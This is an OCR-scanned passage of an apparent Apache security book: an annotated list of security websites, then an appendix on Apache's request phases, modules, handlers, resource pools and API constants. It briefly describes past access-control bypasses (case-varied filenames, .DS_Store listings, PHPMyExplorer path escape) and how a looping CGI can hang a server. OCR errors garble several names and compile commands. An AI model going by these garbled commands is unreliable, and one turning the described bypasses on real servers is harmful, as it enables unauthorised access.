Site Title: VPN and Security Products 
URL: http: //www-kr.cisco.com/warp/public/752/qrg/cpqrg5.htm 


Description: Document that compares various VPN products and highlights Cisco IDS-- 


Network Sensor, which works in conjunction with Apache. 
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Site Title: WAP Gateway and Server Tools 
URL: http: //www.palowireless.com/wap/servertools.asp 


Description: If you intend to incorporate wireless (WAP) functionality into your Web server 
system, this site has a variety of interesting tools, both in its general section and its security- 
specific section. Example: W/Secure SDK, a software development kit allowing application 

developers to create secure encrypted sessions between online networked applications. Uses 


Wireless Transport Layer Security (WTLS). 


Site Title: WDVL: VL-WWW: Tools 
URL: http: //www.wdvl.com/Vlib/Software/Tools. html 


Description: WDVL is an free encyclopedia of Java, HTML, JavaScript, CGI, DHTML, XML, 


Perl, Web design and domain name tutorials and resources. 


Site Title: Web Authentication/Security 
URL: http: //ist.uwaterloo.ca/security/Web-auth/index.html 


Description: Brief survey of the authentication methods available with the Apache Web 
server. An emphasis on the practical application of those methods, the addition of custom 
methods, some observations on the security model and the resulting risks. Credit here goes to 


Reg Quinton. 


Site Title: Web References for The CERT Guide to System and Network Security Practices 
URL: http: //ww.cert.org/security-improvement/practicesbk.html 


Description: A resource list compiled by the Computer Emergency Response Team at 
Carnegie Mellon. It’s actually a bibliography with embedded links from a greater work, the 


controlling article, which also offers excellent advice on securing Web servers. 


Site Title: Web Security Solutions: Central Authentication for Locally Developed Applications 
URL: http: //www.cause.org/ir/library/html/cem993c.html 


Description: An article by Noam Arzt and Daryl Chertcoff that focuses on one approach to 


Web security deployed at Penn University. 


Site Title: WebmasterBase 
URL: http: //www.webmasterbase.com/ 


Description: General Webmaster site that covers many issues (security, intellectual property, 


coding, administration, database integration, and so forth). Credit here goes to SitePoint. 
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Site Title: Incidents.org—The SANS Institute 
URL: http: //www.incidents.org 


Description: An excellent security resource from SANS, Incidents.org tracks attacker activity 
daily (and opens with a color-coded world map of where incidents occurred). Up-to-the- 


minute articles on attacks and solutions. 


Site Title: Wireless Networking Reference—Security 
URL: http: //www.practicallynetworked.com/tools/wireless_articles_security.htm 


Description: Are you planning to use Apache in conjunction with WAP or other wireless 
technologies? If so, give this page a look—it contains articles on wireless security. A typical 
example would be “Wireless Firewall Gateway White Paper,” which describes how the network 
security group in the NASA Advanced Supercomputing (NAS) Division developed a secure 
802.11b wireless networking system. They used an off-the-shelf PC running the OpenBSD 
operating system, an Apache Web server, the Internet Software Consortium DHCP server, and 


IPF firewall software. 


Site Title: www.SNMPLink.org—Tools Products 
URL: http: //www.snmplink.org/Tools. html 


Description: A great site with exhaustive and constantly up-to-date SNMP resources (like the 
Securelntelligence suite from SNMP Research International, Inc.). If you incorporate SNMP 
into your overall administrative regimen, this site’s a must-visit. Credit here goes to Pierrick 
Simier. 


Site Title: Xatrix Security 
URL: http://www. xatrix.org/top.php 


Description: Xatrix is a computer security news portal that covers a wide range of Web secu- 
rity topics. The administrators have written scripts that rate their articles by how many times 
visitors have read them, thus giving you (perhaps) a benchmark of which articles are most 
important. A example article is “Microsoft May Disable Upgraded PCs,” which explains that 
“Users who upgrade their PCs may find they will not work when switched back on, under the 
software giant’s plan to use an artificial intelligence engine to deactivate illegal copies of 
Windows XP.” 
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Site Title: XML Cover Pages 
URL: http: //xml.coverpages.org/xmlArticles.html 


Description: Extensive collection of up-to-date XML resources (papers, articles, tools, 
commentary, reviews). The site also harbors copious links to XML schema. If you plan to use 


Apache for commerce-based applications, go here. Credit here goes to Robin Cover. 


Site Title: XML Tools by Category 
URL: http: //moheadstart.org/~vnp9b1/xmltools.htm 


Description: This site harbors copious links to XML server tools. If you plan to use Apache 
for commerce-based applications, you should visit this site. A good example is IBM’s XML 


Security Suite. Credit here goes to Vijay Parmar at The University of Missouri, Columbia. 


Site Title: Zope—A Swiss Army Knife for the Web? 
URL: http: //www.bristol.edu/ISC/zope/vine/vinezope.html 


Description: Zope is an open source Web application platform for both NT and Unix, which 
will interoperate with Web servers such as Apache and IIS. It supports ftp, http put, and 
WebDAV publishing methods. It has a highly developed security model, which allows the 
management of content to be extensively devolved. Zope integrates well with relational data- 
bases and other services (including LDAP and IMAP). 
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Apache API Quick 
Reference 


This appendix briefly examines the Apache API and 
addresses the following topics: 


e Anatomy of an Apache transaction 
e Configuration 
e Handlers 


e Resource allocation 


Anatomy of an Apache Transaction 


When you properly install, configure, and run Apache Web 
Server, its transactions conform to the model illustrated in 
Figure D.1. 


Figure D.1, of course, describes only a simple request and 
does not consider more complicated transactions that 
could unfold with SSL, route themselves through multiple 
third-party modules, and so forth. 


Such basic transactions take a request through eight 
phases: 


e URI handling 

e User ID check 

e User auth check 
e User access check 
e MIME-type ID 


e External hooks 
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e Response 


e Logging 


mod_alias 
mod_rewrite 
mod_userdir 
mod_speling 
mod_vhost_alias 


URI Handling 


mod_access 
mod_auth 
mod_auth_dbm 
mod_auth_db 
mod_auth_anon 
mod_auth_digest 
mod_auth_Idap 


M 


User ID Check 


User Auth Check 





User Access Check 


mod_mime A user’s request must first 
mod_mime_magic survive all hurdles above 
mod_negotiation this line before Apache 
mod_charset_life serves the requested data. 


MIME-type ID 





External Hooks AP_DECLARE_HOOK(int, do_something, (some_func *r, int n)) 


mod_headers 
mod_cern_meta 


mod_include 
mod_cgi 


Response mod_cgid 


mod_expires 
mod_asis 





mod_actions 
mod_isapi 


- mod_ext_filter 
Logging mod_log_config mod_suexec 
mod_usertrack 








FIGURE D.1 The basic progression of a simple Apache transaction. 


URI Handling 


Apache Web Server first establishes if it can satisfy the request. To determine this, 
Apache examines and translates URIs. The functions and hooks that control this 
process live chiefly in apache -source/httpd-version/server/request.c. In Apache 
2.0.28, these run from line 94 to line 1708. 


They are as follows: 


e decl_die()—Returns an error if httpd finds the request malformed, or where 
the STATUS flag is DECLINED (lines 124-134). 


e ap _process_request_internal()—Sets forth httpd’s core request-handling 
logic (lines 141-282). 
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ap_getparents()—Filters /../ and /./ sequences to formulate a real path, if 
possible (line 154). 


prep_walk_cache()—Checks the cache for recent cache entries. If none exist, it 
creates one (lines 308-339). 


check_safe_file()—Filters requests for things that are not files, directories, or 
symbolic links. This protects the underlying system from malicious requests 
(lines 360-374). 


ap_directory_walk()—Handles directory configuration information, checks 
FollowSymlinks and FollowSymOwner status, and checks for .htaccess files at 
the directory level (lines 449-1004). 


ap_location_walk()—Checks for location matches (lines 1053-1199). 


translate_name—Lets modules handle or translate the URI/filename, based on 
whether it’s an alias, residing in a vhost’s directory, and so on (line 165). 


map_to_storage—lIf Apache gets the URI—and the URI is legal—this lets 
modules map it to something based on per-directory configurations then 
present (line 175). 


ap_location_walk()—To exclude requests with no real URI, Apache runs the 
location walk again, to ensure an override to the map_to_storage configuration 
(lines 1053-1199). 


header_parser—Apache parses the client’s headers (line 192). 
access_checker—Checks user access information (line 214). 
auth_checker —Checks user auth information (line 225). 


type_checker — Lets modules set content type, language, character set and 
request handler (line 264). 


ap_file_walk()—Checks for cache/file matches (lines 1201-1341). 


make_sub_request ()—Handles relative URI requests, such as Server Side 
Includes, map files, or other sub-request components (lines 1359-1368). 


fill_in_sub_req_vars()—Starts a new configuration for a request to the speci- 
fied vhost, copies the allowed methods list, and sets the appropriate output 
filters (lines 1370-1406. 


ap_some_auth_required()—Checks for required arguments or line configura- 
tion for this request type. If so, and such arguments or line configurations are 
absent, httpd drops the request on error (lines 1425-1446). 


ap_sub_req_method_uri()—Creates a new sub-request and sets up the r->main 
pointer (lines 1449-1484). 
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ap_sub_req_lookup_uri()—Calls ap_sub_req_method_uri with a GET request 
type (lines 1486-1491). 








ap_sub_req_lookup_dirent()—Calls fill_in_sub_req_vars, creates a new 
request, stats files, resolves symbolic links, fills in parsed_uri values, and, if 
possible, satisfies the new request (lines 1493-1586). 


ap_sub_req_lookup_file()—Handles canonical names and relative path 
requests (lines 1588-1677). 





ap_destroy_sub_req()—Destroys the last processed sub-request (lines 
1688-1692). 


ap_update_mtime()—Sets the r->mtime field (lines 1698-1703). 


ap_is_initial_req()—Differentiates sub-requests from internal redirects (lines 
1708-1714). 


During such a transaction, a request might fall through to several URI-handling 
modules, which perform varied operations. 


URI-Handling Modules 

If you install the Apache distribution from the source, modules associated with URI 
handling will reside in apache-source/httpd-version/mappers and include the 
following: 


mod_actions—Executes scripts on MIME types or HTTP methods 


mod_alias —Maps different parts of the host filesystem in the document tree, 
and handles URL redirection 


mod_dir—Handles default index files and -/ redirects 
mod_imap—Handles image maps 

mod_negotiation—Tracks what MIME types the client supports 
mod_rewrite—Maps URIs to filenames using regular expressions 
mod_so—Loads modules at runtime 

mod_speling—Corrects simple spelling errors in URLs 
mod_userdir—Maps user home directories 


mod_vhost_alias—Provides support for dynamic virtual hosting 
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User ID, Authentication, and Access 


A transaction’s second major phase is where Apache handles user ID, authentication, 
and access (Is this user who she claims to be, and does she have authorized access to 
the specified resource?) During this phase, a request can fall through to several user 
ID, authentication, and access modules, which perform widely varied operations. 


User ID, Authentication, and Access Modules 
Modules associated with user access and authentication reside in apache - 
source/httpd-version/aaa and include the following: 


e mod_access—Provides access control based on client hostname or IP address. 
mod_access provides this access control through .htaccess files and within 
<Directory>, <Files>, and <Location> directive blocks. 


e mod_auth—Manages HTTP Basic authentication using plain text password and 
group files in the htpasswd system. With Basic authentication, Apache queries 
. htaccess files. These store your access rules and file locations. 


e mod_auth_anon—Provides anonymous user management and lets you specify if, 
how, and where anonymous users gain entry to password-protected directories. 


e mod_auth_db—Provides user authorization through Berkeley DB files. 
e mod_auth_dbm—Provides user authorization through DBM files. 


e mod_auth_digest—Provides authentication through use of message digest algo- 
rithms. Currently, above and beyond Basic type authentication, Apache 
supports digest-based cryptographic authentication using MDS. 


MIME-Type Determination 


If an object exists, if Apache can serve it, and if a user can access it, Apache must 
determine its MIME-type. For this, Apache uses several MIME-type related modules. 


MIME-Type Related Modules 
MIME-type modules handle content type decisions. They are as follows: 


e mod_mime—Determines document types using file extensions. Located in 
apache -source/httpd-version/mappers. 


e mod_mime_magic—Determines document types using magic numbers. Located 
in apache-source/httpd-version/metadata. 
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e mod_negotiation—Handles content negotiation. Located in apache - 
source/httpd-version/mappers. 


e mod_charset_lite—An experimental module that sets the source character 
object set. You can use it to specify the character set source, default, and 
options. Located in apache -source/httpd-version/experimental. 


Response 


If an object exists, if Apache can serve it, if a user can access it, and after Apache 
determines its MIME-type, Apache must next format a response and associated 
headers. For this, it uses response header modules. 


Response Header Modules 
Response header modules handle HTTP headers. They are as follows: 


e mod_asis—Provides support to return files (with, for example, an .asis exten- 
sion) without adding headers to them. That is, Apache sends such files as is, 
without appending headers—except for Date: and Server:, which it always 
sends. Located in apache-source/httpd-version/generators. 


e mod_cern_meta—Provides support for CERN httpd metafile semantics. Located 
in apache-source/httpd-version/metadata. 


e mod_expires—Applies Expires headers to resources. Located in apache - 
source/httpd-version/metadata. 


e mod_headers—Adds arbitrary HTTP headers to resources. Located in apache - 
source/httpd-version/metadata. 


Dynamic Content Handling 


Not every resource is static. Apache must build some resources from dynamic 
content. To do so, it uses dynamic content-handling modules. 


Dynamic Content Modules 
Dynamic content modules handle specialized, dynamic responses, such as Common 
Gateway Interface or ISAPI transactions. They are as follows: 


e mod_actions—Provides support for executing CGI scripts based on media type 
or request method. Located in apache -source/httpd-version/mappers. 


e mod_cgi—Provides support for invoking CGI scripts. Located in apache - 
source/httpd-version/generators. 
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e mod_cgid—Provides support for invoking CGI scripts using an external 
daemon. Located in apache -source/httpd-version/generators. 


e mod_ext_filter—Provides support for filtering content with external programs. 
Located in apache-source/httpd-version/experimental. 


e mod_include—Provides support for server-parsed documents (SSI). Located in 
apache -source/httpd-version/filters. 


e mod_isapi—Provides support for Windows ISAPI Extension support. Located in 
apache -source/httpd-version/arch/win32. 


e mod_suexec—Provides support for running CGI requests as a specified user and 
group. Located in apache -source/httpd-version/generators. 


The Logging Phase 


Finally, when Apache performs a transaction, it must lastly log that transaction to 
file. To do so, it deploys two logging modules. 


Logging Modules 
Logging modules handle Apache’s logging facilities. They are as follows: 


e mod_log_config—User-configurable logging replacement for mod_log_common. 
Located in apache-source/httpd-version/loggers. 


e mod_usertrack—Offers user tracking with cookies. Located in apache - 
source/httpd-version/loggers. 


Configuration 


Beyond the simplicity of the eight-phase process I earlier described, Apache’s 
complexity significantly increases. This is partly because Apache’s development 
model is modular. (Apache folks exported many functions to modules that NCSA, for 
example, concentrated in the server.) Moreover, Apache grants you wide latitude to 
exert granular control through a per-directory configuration system. This means that 
you can apply one rule set to one directory and another rule set to another directory. 


To understand this, please see the example in Figure D.2. 


NOTE 


You'll find references to ap_directory_walk() in the files apache -source/httpd- 
version/include/http_request.h, apache-source/httpd-version/server/code.c, and 
apache-source/httpd-version/server/request.c. 
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this is how you configured it. 





FIGURE D.2 Per-directory rules illustrated. 


As depicted in Figure D.2, we have a directory structure below DocumentRoot. Here, 
subdirectories have different access rules: 


e root grants access to larry, moe, and curly. 
e /home/httpd/html/modules grants access to larry and moe. 


e /home/httpd/html/modules/mod_auth_db grants access to moe only. 


To handle this situation, Apache—almost immediately upon receiving a request— 
launches ap_directory_walk() to look for per-directory rule sets residing in 
.htaccess files. This is complicated, because Apache’s base configuration file may 
often contain access control rule sets, too. Hence, Apache must combine the two— 
global and per-directory rule sets—and from this combination, determine if a user 
has sufficient access privileges. This combination is called merging and happens at a 
modular level. 


From this, you’d conclude that modules lacking merging functions force Apache to 
resort to httpd’s default access rules. However, unless developers make other provi- 
sions or you do explicitly, Apache uses the targeted directory’s access rules and 
ignores the parent’s rules. 
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Apache’s development team took precautions to prevent security issues from arising 
around this. However, issues occasionally arise anyway. Good examples are the prob- 
lems inherent in some Apache Mac OS X distributions. These issues—which enable 
remote attackers to traverse or otherwise view access control-protected directories— 
stem from several sources. 


In one case, it was merely an operating system-based problem. Mac OS X supports 
Hierarchical File System (HFS). HFS by itself does not apply case-sensitive rules to file- 
names and directories. Because of this, remote attackers could bypass Apache’s access 
control rules by requesting files with varied upper and lowercase characters. For 
example, if a protected file were named index.html, attackers could bypass its access 
restrictions by requesting InDeX.HtM1. To address this issue, Apple released mod_hfs, 
which now enforces pseudo case-sensitivity. 


Independent researcher Jacques Distler brought another hole of this variety to light— 
but from a different angle—on September 10, 2001. Distler determined that when 
attackers used the Mac OS X client and requested a URL from affected systems, if the 
request included a specification of a .DS_Store file, Apache revealed the directory’s 
contents. To address this, Distler recommended using the <FilesMatch> directive to 
shut out access. <FilesMatch> enables you to specify what Apache does when a 
client requests the specified file type. This <FilesMatch> uses basic regular expression 
pattern matching. For example, to disallow access to GIF or JPEG files: <FilesMatch 
"\. (gif |jpe?g)$">. 


NOTE 





See “More Security Problems in Apache on Mac OS X,” located at 
http: //www.macintouch.com/mosxreaderreports46.html to learn more about the 
.DS_Store vulnerability. 





These examples demonstrate how even Apache’s best efforts sometimes fail, and 
often Apache isn’t responsible. Rather, underlying issues with operating systems, third- 
party modules, and utilities can undermine Apache’s otherwise tight security 
controls. 


Consider these issues—especially global and local access control configuration rules— 
when authoring new modules or utilities that collaborate with Apache. Nothing will 
make folks swear off your new module or tool faster than when they discover that it 
enables remote attackers to escape the Web tree into the general population. 


Has this ever happened? You bet. In August 2001, Ben Ford showed that 
PHPMyExplorer Classic [1.0, 1.1.0, 1.1.1, 1.1.3, 1.1.4, 1.1.5, and 1.2], a front end, 
browser-based Web manager, let attackers break out of DocumentRoot and browse the 
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greater file system at will. This was a disaster and offered experienced attackers root 
access. 


NOTE 


To learn more about the attack Ford described, go to http://www. securityfocus.com/cgi- 
bin/vulns-item.p1?section=inf0&id=3266. 





Handlers 


Apache handlers indicate what Apache will do when a client requests a specified 
resource. That is, handlers provide httpd with a way to store file extension or data 
associations. 


You’ve likely seen handlers loaded into httpd.conf, for even in a default install, 
Apache sets handlers using the AddHandler directive. 


For example: 


AddHandler cgi-script .cgi 
AddHandler server-parsed .shtml 
AddHandler send-as-is asis 
AddHandler imap-file map 
AddHandler type-map var 


AddHandler’s syntax demands a handler name and a handler extension—in this case, 
a file extension. Though it operates at a more discrete level, this vaguely resembles 
how you create file associations in Windows. File associations tell Windows which 
application to use when opening or executing a file that carries a specific extension 
(for example, opening *.txt files with notepad. exe). But that’s where the 
similarities end. 


Handler specifications tell Apache what handler to use for the given file extension. 
For example, consider this line: 


AddHandler cgi-script .cgi 
This line tells Apache that files with the *.cgi extension contain Common Gateway 
Interface program or machine code. This places Apache on notice to send such 


requests through mod_cgi. Apache does not concern itself at this stage with the file’s 
language. It could be 


e A compiled C program 


e Perl source code 
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Python source code 


Shell source code 


Indeed, at this particular stage, Apache doesn’t care what the file’s contents are. The 
important thing is merely that it has a *.cgi file extension and is therefore a CGI 
script or program. 


Traditional Apache default handlers are as follows: 


cgi-script—Files with the specified extension are CGI programs, and Apache 
therefore invokes mod_cgi. 


default -handler—This calls for the default_handler(), which handles static 
content. 


imap -file—Files with the specified extension are imagemap rule files, and 
Apache therefore invokes imap_file. 


send-as-is—Apache should send files with the specified extension without 
writing headers (except for Date: and Server:) and invoke mod_asis. 


server -info—Gets the server’s configuration information, which mod_info 
handles. 


server -parsed—Files with the specified extension contain not merely HTML, 
but also Server-Side Includes (SSI), so Apache should invoke mod_include. 


server -status—Gets the server’s status report, which mod_status handles. 


type -map— Apache should parse files with the specified extension as type-map 
files and invoke mod_negotiation. 


Handlers, after performing their assigned tasks, return an int that reports the trans- 
action’s status. This can be one of three things: 


An Apache error code—This kills any further processing of the current request. 
In this instance, something went terribly awry. 


DECLINED—No error arose, but for some other reason the module refuses this 
phase. Apache tries to find another phase, and if so, it uses that. Otherwise, if 
no other contingency arises, it applies its own handlers and continues. 


O0K—The handler performed its assigned task successfully. This doesn’t necessar- 
ily wrap up the transaction (or end the phase), but merely reports that this 
particular handler is done. 


So, we’ve looked at handlers from the outside in, examining their functions and how 
you attach or set them. We’ve also covered several traditional handlers. Now, we'll 
take a closer look at handlers and how they perform their duties. 
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Handlers in Action 


Apache invokes a handler with a single argument: the request object. Request objects 
encapsulate vital data about requests, including the following: 


e Bytes sent 

e Content type 

e Encoding 

e Filename 

e Method 

e Path 

e Protocol to use 

e Request description 
e Status 


e URI 


Apache handlers are capable of filling in these fields as needed, if Apache or a previ- 
ous handler or function didn’t. Or, yet another contingency is this: Perhaps the 
handler acquires every needed field, but cannot find or return the requested object. 
In that case, the handler returns a standard HTTP error code (404, perhaps), and 
Apache completes the transaction by constructing and returning an error result (for 
example, File Not Found). 


NOTE 


In most cases, Apache passes the request object with fields already populated. Exceptions are 
when dealing with image maps or CGI scripts, both of which might demand resources not 
included in the client’s original request. Here, Apache launches an internal redirect and a new 
request_rec for the server-side resources called within these objects. 





Resource Allocation 


Server applications like httpd are challenging to write, especially from a resource 
allocation viewpoint. To appreciate this, contrast such servers against word process- 
ing applications. 


Today, when you author a word processor application, you have your choice of a 
single or multi-document interface (MDI). Single document interfaces open one 
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word processing window per program instance. MDI-based word processors can open 
several documents in the same program instance. 


However, even if you open ten documents via MDI, your word processor will likely 
eat only meager memory resources. That is, you face only a slim chance that your 
word processor will eat all the system memory. This is because word processors are 
single-user applications, and most PCs today sport ample memory and swap file 
space. 


Network servers work differently. Many users can access network servers simultane- 
ously. In fact, you have no way to anticipate how many users will access your 
network application in any given week, day, hour, minute, or second. This raises 
resource allocation concerns. 


For each instance of a network server—or for each time a network server forks—the 
system must render resources. You, as a developer, must account for this in-program 
and limit to every degree possible the resources a typical transaction consumes. 


Certain types of network servers don’t raise overwhelming resource allocation 
concerns. For example, consider a network server that returns the system time. The 
utility date eats sparse memory and exits almost instantaneously. Thus, the exchange 
will eat nominal system resources. But Apache doesn’t return merely the time. 


Indeed, Apache—depending on what modules you load—can do all sorts of things, 
including open files, query databases, parse XML, spawn processes, draw graphs, and 
so on. Each such action devours resources—perhaps substantial resources. Add to this 
the fact that 500 users could be accessing your Web site at any given moment, and 
suddenly resources become a tremendous concern. 





If you want to see how fast your Web server can eat 100% system resources, write a CGI 
program that opens a file, traverses each line, and for each such line, performs some opera- 
tion. Do this with a while() counter, but don’t increment your counter. This will throw the CGI 
into an infinite loop and hang Apache. At around 40 seconds, most average Web boxes will 
grind to a crawl. At two minutes, they become totally unresponsive. 


The Apache development team carefully considered resource allocation and settled 
on a system called the resource pool. The resource pool works like this: Apache assigns 
each request a resource pool, or a data structure that records and temporarily ware- 
houses data on the associated request. This data structure persists throughout the life 
of the specified request. 


When Apache satisfies the request (or otherwise disposes of it), Apache clears that 
request’s associated resource pool and in the process, closes or releases all resources it 
allocated during the processing of that request. This is called clean up. 
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Apache’s resource pool clean up is quite thorough and kills, closes, or otherwise 
releases 


e Child processes 

e Open external processes 
e Open files 

e Pipes 

e Sub-pools 


e Sub-requests 


Apache pools are 
e permanent_pool—tThe parent of all memory pools 
e pconf—Handles all configuration-time routines 
e pchild—Created during and for the child process, and handles the same 
e r->pool—For top-level or main requests 


Learn more about these pools in Chapter 18, “Hacking Homegrown Apache 
Modules.” 


Apache API Constants 


Table D.1 identifies some important Apache constants not well-documented in other 
titles. 


TABLE D.1 Apache API Constants 





Constant Description 

ACCESS_CONF Access control restrictions inside <Directory> or 
<Location> directives. 

APLOG_ALERT Logging alert messages (ap_log_rerror). 

APLOG_CRIT Logging critical messages (ap_log_rerror). 

APLOG_DEBUG Logging debug messages (ap_log_rerror). 

APLOG_EMERG Logging emergency messages (ap_log_rerror). 

APLOG_ERR Logging error messages (ap_log_rerror). 

APLOG_INFO Logging informational messages (ap_log_rerror). 

APLOG_LEVELMASK Logging messages that exceed minimum level 


(ap_log_rerror). 
APLOG_MARK Logging (ap_log_rerror). 
APLOG_NOERRNO Logging (ap_log_rerror). 
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Constant 


Description 





APLOG_NOTICE 
APLOG_WARNING 
APLOG_WIN32ERROR 
BIG_SECURITY_HOLE 


BO_BYTECT 
B_ASCII2EBCDIC 


B_CHUNK 


B_EBCDIC2ASCII 
B_EOF 
B_ERROR 


cmd_how 


DEFAULT_ADMIN 


DEFAULT_CONTENT_TYPE 


DEFAULT_HTTPS_PORT 


DEFAULT_HTTP_PORT 


DEFAULT_INDEX 


DEFAULT_KEEPALIVE 


DEFAULT_KEEPALIVE_TIMEOUT 


Logging notice messages (ap_log_rerror). 

Logging warning messages (ap_log_rerror). 

Logging WIN32 error messages (ap_log_rerror). 
Compile-time directive that enables Apache to run as 
root even after it starts. Not a good idea. 

Options to bset/getopt. 

For translating ASCII encoded strings to their equivalent 
EBCDIC representations (binary safe). 

If B_CHUNK is set, then routines using end_chunk() must 
be sure to call start_chunk() or set an error condition 
before they return to the caller. (Buffer setup). 

For translating EBCDIC representations to their ASCII 
equivalents. 

Buffer end-of-file. 

Expanded error field (buf). 

Values designating a given request_rec processes argu- 
ments. 

Sets the default admin directory. Compile-time definition, 
and you can change it like this: env CFLAGS="-Wall 
DDEFAULT_ADMIN=\"/usr/httpd/htdocs\"" ./ 
configure. 

Sets the default content type. You can set this at 
compile-time like this: env CFLAGS="-Wall 
DDEFAULT_CONTENT_TYPE=\ “application/octet - 
stream\"" ./configure. 

This stores the port on which https will start, and it’s 
typically port 443. 

This stores the port on which Apache will start, and it’s 
typically port 80. 

If no DefaultIndex is defined, Apache uses this instead. 
Compile with openenv CFLAGS="-Wall 
DDEFAULT_INDEX=\"default.htm1\"" ./configure. 
Specifies the default KEEPALIVE timeout value. This is a 
compile-time option, and you set it like this: env 
CFLAGS="-Wall -DDEFAULT_KEEPALIVE="20" ./ 
configure. 

Specifies the default KEEPALIVE timeout value. This a 
compile-time option, and you set it like this: env 
CFLAGS="-Wall -DDEFAULT_KEEPALIVE_TIMEOUT=20" 

. /configure. 
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TABLE D.1 Continued 





Constant 


Description 





DEFAULT_PATH 


DEFAULT_TIMEOUT 


DOCUMENT_LOCATION 


DONE 


DYNAMIC_MODULE_LIMIT 


FLAG 
GLOBAL_ONLY 


HARD_SERVER_LIMIT 


HTTPD_ROOT 


HTTP_ACCEPTED 


HTTP_BAD_GATEWAY 


HTTP_BAD_REQUEST 


Compile-time definition that sets the default PATH. You 
set it like this: env CFLAGS="-Wall - 
DDEFAULT_PATH=\"/usr/local/bin:/ 

bin:/usr/bin\"" ./configure. 

A compile-time definition of the default timeout (in 
seconds). You set it like this: env CFLAGS="-Wall - 
DDEFAULT_TIMEOUT=600" ./configure. 

Constant default for DocumentRoot. Can be set at 
compile-time, like this: env CFLAGS="-Wall -DDOCU- 
MENT_LOCATION=\"/usr/httpd/htdocs\"" 
./configure. 

Module phase handlers return DONE status when they've 
successfully satisfied a request. 

The maximum number of modules that Apache can 
dynamically load. The default is 64, but you can set this 
at compile-time like this: env CFLAGS="-Wall - 
DDYNAMIC_MODULE_LIMIT=XxX" ./configure. 


Directives with this bit set can only appear (and Apache 
will only interpret them if they are located) in Apache’s 
server-wide config files. See NOT_IN_DIRECTORY, 
NOT_IN_DIR_LOC_FILE, NOT_IN FILES, NOT_IN_LIMIT, 
NOT_IN_ LOCATION, and NOT_IN_VIRTUALHOST. 

The maximum possible number of server processes. On 
the Windows platform, this is 1024 (threads). The default 
value on all other platforms is 256. You can set this at 
compile-time like this: env CFLAGS="-Wall 
DHARD_SERVER_LIMIT=1024" ./configure. 

The same as ServerRoot, this is where Apache resides 
(for example, /usr/local/apache). You can set this at 
compile-time like this: env CFLAGS="-Wall 
DHTTPD_ROOT=\"/usr/httpd\"" ./configure. 
Constant denoting HTTP Accepted status. Apache 
received the response and is processing it. 

Denotes HTTP Bad Gateway status. Apache, acting as a 
proxy, contacted an upstream server which in turn issued 
a bad, flawed, or incomprehensible response. 

Denotes HTTP Bad Request status. The client sent a 
request with bad syntax, and Apache can’t under- 
stand it. 
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Constant 


Description 





HTTP_CONFLICT 


HTTP_CONTINUE 


HTTP_CREATED 


HTTP_FORBIDDEN 


HTTP_GATEWAY_TIME_OUT 


HTTP_GONE 


HTTP_INTERNAL_SERVER_ERROR 


HTTP_LENGTH_REQUIRED 


HTTP_METHOD_NOT_ALLOWED 


HTTP_MOVED_ PERMANENTLY 


HTTP_MOVED_ TEMPORARILY 


HTTP_MULTIPLE_CHOICES 


HTTP_NON_AUTHORITATIVE 


HTTP_NOT_ACCEPTABLE 


HTTP_NOT_FOUND 


HTTP_NOT_IMPLEMENTED 





HTTP_NOT_MODIFIED 


Denotes HTTP Conflict status. Apache couldn’t 
complete the request because of some resource conflict. 
Denotes HTTP Continue status. Apache permits the client 
to continue its request. 

Denotes HTTP Created status. Apache satisfied the 
request and, as a result, created a new resource. 

Denotes HTTP Forbidden status. Apache refused to 
return the requested resource (typically because the 
client doesn’t have authorization). 

Denotes HTTP Gateway Time Out status. The “third 


j” 


wheel” server never returned any data to Apache, which 
is running as a proxy. 

Denotes HTTP Gone status. The requested resource is 
unavailable and left no forwarding address. 

Denotes HTTP Internal Server Error status. The 
server encountered an unexpected condition (perhaps a 
CGI script’s headers trail off prematurely?). 

Denotes HTTP Length Required status. Apache refuses 
to accept the request without a defined Content-Length. 
Denotes HTTP Method Not Allowed status. Apache 
forbids this request method for the specified URI. 
Denotes HTTP Moved Permanently status. The requested 
resource has been assigned a new permanent URI. 
Denotes HTTP Moved Temporarily status. The requested 
resource resides temporarily at a different URI. 

Denotes HTTP Multiple Choice status. Apache has 
several representations of the requested element: Which 
one does the client want? 

Denotes HTTP Non Authoritative response status. The 
content came from a third-party source, not its original 
home server. 
Denotes HTTP Not Acceptable status. The client asked 
for the document and the document exists, but it 
doesn’t match the client’s desired content characteristics. 
Denotes HTTP Not Found status. Apache couldn’t find 
the requested resource. 

Denotes HTTP Not Implemented status. Apache doesn’t 
support the specified method. 

Denotes HTTP Not Modified status. Conditional GET 
request satisfied, but the target document remains 





unmodified. 
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TABLE D.1 Continued 





Constant 


Description 





HTTP_NO_CONTENT 


HTTP_OK 


HTTP_PARTIAL_CONTENT 


HTTP_PAYMENT_REQUIRED 


HTTP_PRECONDITION_FAILED 


HTTP_PROXY_AUTHENTICATION REQUIRED 


HTTP_REQUEST_ENTITY_TOO_LARGE 





HTTP_REQUEST_TIME_OUT 


HTTP_REQUEST_URI_TOO_LARGE 


HTTP_RESET_CONTENT 
HTTP_SEE_OTHER 


HTTP_SERVICE_UNAVATLABLE 


HTTP_SWITCHING PROTOCOLS 
HTTP_UNAUTHORIZED 
HTTP_UNSUPPORTED_MEDIA_TYPE 
HTTP_USE_PROXY 
HTTP_VARIANT_ALSO_VARIES 
HTTP_VERSION_NOT_SUPPORTED 
HUGE_STRING_LEN 


ITERATE 
ITERATE2 


Denotes HTTP No Content status. Apache found nothing 
to return. 
Denotes HTTP OK status. All is well; Apache performed 
the requested operation successfully. 

Denotes HTTP Partial Content status. Apache 
performed a partial GET, as requested. 

Denotes HTTP Payment Required. (You forgot to pay us, 
pal.) Not in use yet, but will it ever be! 

Denotes HTTP Precondition Failed status. (Apache 
tried the precondition but it failed.) 

Denotes HTTP Proxy Authentication Required status. 
(Go authenticate yourself at the proxy and then come 
back.) 
Denotes HTTP Request Entity Too Large status. 
Someone sent a request entity that exceeded the limit 
(maybe trying to eat your resources). 

Denotes HTTP Request Time Out status. (The client 
never sent anything). 

Denotes HTTP Request URI Too Long status. (They sent 
a request that exceeded the limit, maybe trying to eat 
your resources.) 

Denotes HTTP Reset Content status. 

Denotes HTTP See Other status. (Use a GET to retrieve 
the document elsewhere, wherever it moved to.) 
Denotes HTTP Service Unavailable status. Server is 
down. 
Denotes HTTP Switching Protocols status. 
Denotes HTTP Unauthorized status. 

Denotes HTTP Unsupported Media Type status. 
Denotes HTTP Use Proxy status. 

Denotes HTTP Variant Also Varies status. 





Denotes HTTP Version Not Supported status. 

Defines the largest static string buffer Apache supports 
(same as MAX_STRING_LEN). 

Take one argument, which can occur more than once. 
Take one argument, the second of which can occur more 
than once. 


TABLE D.1 Continued 


Apache API Constants 593 





Constant 


Description 





kill_conditions 
